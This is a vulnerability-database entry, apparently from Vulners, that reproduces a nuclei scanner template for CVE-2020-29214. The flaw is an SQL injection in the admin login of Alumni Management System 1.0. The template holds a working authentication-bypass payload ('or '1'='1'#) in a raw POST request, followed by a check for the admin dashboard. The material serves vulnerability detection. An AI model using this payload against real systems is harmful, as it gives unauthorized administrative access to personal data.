Lucene search
K

Alumni Management System 1.0 - SQL Injection

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

Alumni Management System 1.0 has SQL injection in admin login enabling authentication bypass.

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
SourceCodester Alumni Management System SQL注入漏洞
15 Jun 202100:00
cnnvd
CNVD
SourceCodester Alumni Management System SQL Injection Vulnerability
16 Jun 202100:00
cnvd
CVE
CVE-2020-29214
15 Jun 202119:57
cve
Cvelist
CVE-2020-29214
15 Jun 202119:57
cvelist
NVD
CVE-2020-29214
15 Jun 202120:15
nvd
OSV
CVE-2020-29214
15 Jun 202120:15
osv
Prion
Sql injection
15 Jun 202120:15
prion
id: CVE-2020-29214

info:
  name: Alumni Management System 1.0 - SQL Injection
  author: arafatansari
  severity: critical
  description: |
    SourceCodester Alumni Management System 1.0 contains a sql_injection caused by unsanitized input in admin/login.php, letting attackers bypass authentication, exploit requires injection of malicious SQL payload.
  impact: |
    Unauthenticated attackers can bypass authentication through SQL injection, gaining administrative access to the Alumni Management System and access to all alumni data.
  remediation: |
    Apply vendor patches or upgrade to a patched version.
  reference:
    - https://www.exploit-db.com/exploits/48883
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29214
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29214
    cwe-id: CWE-89
    epss-score: 0.04499
    epss-percentile: 0.90354
    cpe: cpe:2.3:a:alumni_management_system_project:alumni_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: alumni_management_system_project
    product: alumni_management_system
  tags: cve,cve2020,sqli,auth-bypass,cms,edb,alumni,vuln

http:
  - raw:
      - |
        POST /admin/ajax.php?action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
      - |
        GET /admin/index.php?page=home HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Welcome back Admin!'
          - 'Alumni List'
        condition: and

      - type: word
        part: body
        words:
          - '#login-form'
        negative: true

      - type: status
        status:
          - 200
# digest: 490a0046304402201604958fd40a6424b2cbb3742bd646cedd558ce3952653ba0bed17828a9bcfea0220041a2044ed375da79ce3798cacbe8d3d6b54c1283312ffd952135d910459a24f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.04499
10